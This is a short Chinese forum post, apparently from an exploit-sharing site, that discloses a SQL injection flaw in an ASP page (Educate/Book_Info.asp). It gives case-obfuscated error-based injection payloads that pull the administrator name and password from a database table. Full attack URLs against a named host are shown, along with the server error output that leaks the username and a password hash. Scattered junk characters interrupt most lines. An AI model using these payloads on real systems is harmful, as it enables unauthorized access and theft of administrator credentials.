漏洞出现在Educate/Book_Info.asp
8 V! t x& m' v此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
* `# W: e# f6 x9 [exp:如下
2 |1 X( s! Q& J/ L9 J! o, [查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( J1 w( V6 N+ d- Z
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) ^- \4 l( |* f/ m6 f" ?
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# O) {4 s$ g4 x1 n; A! ^2 A
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'3 J4 b& Y: {# P6 T& ^: J
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
& T0 d( ^' I/ d0 Y4 J! c( e s+ H/Educate/Book_Info.asp,行 8
# z% D. T! E/ _. }) g5 uhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* S4 Z5 q J2 B3 |. g4 R9 U7 ~7 n/ h
Microsoft OLE DB Provider for SQL Server 错误 '80040e07', F+ L' t6 x4 `% R K4 o2 a
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% B- d* C1 ^. C4 }& }/ M* C, Z
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对